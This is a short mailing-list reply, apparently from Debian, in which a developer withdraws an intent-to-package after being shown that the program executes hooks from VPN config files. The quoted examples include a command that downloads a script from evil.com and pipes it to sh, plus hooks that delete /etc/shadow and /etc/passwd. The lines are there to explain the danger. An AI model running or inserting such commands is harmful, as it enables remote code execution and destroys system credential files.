> Yes. For example these snippets will do what you fear they will:
> script-security 2
> up curl http://evil.com/root-me.sh | sh
> up rm /etc/shadow
> down rm -f /etc/passwd
I just looked into the code myself and have to say you got me
convinces. I rescind my ITP and close the report again.
Ah, would have made some things easier, but I guess I don't want to use
this program either.
Michael at Fam-Meskes dot De, Michael at Meskes dot (De|Com|Net|Org)
Meskes at (Debian|Postgresql) dot Org
Jabber: michael at xmpp dot meskes dot org
VfL Borussia! Força Barça! SF 49ers! Use Debian GNU/Linux, PostgreSQL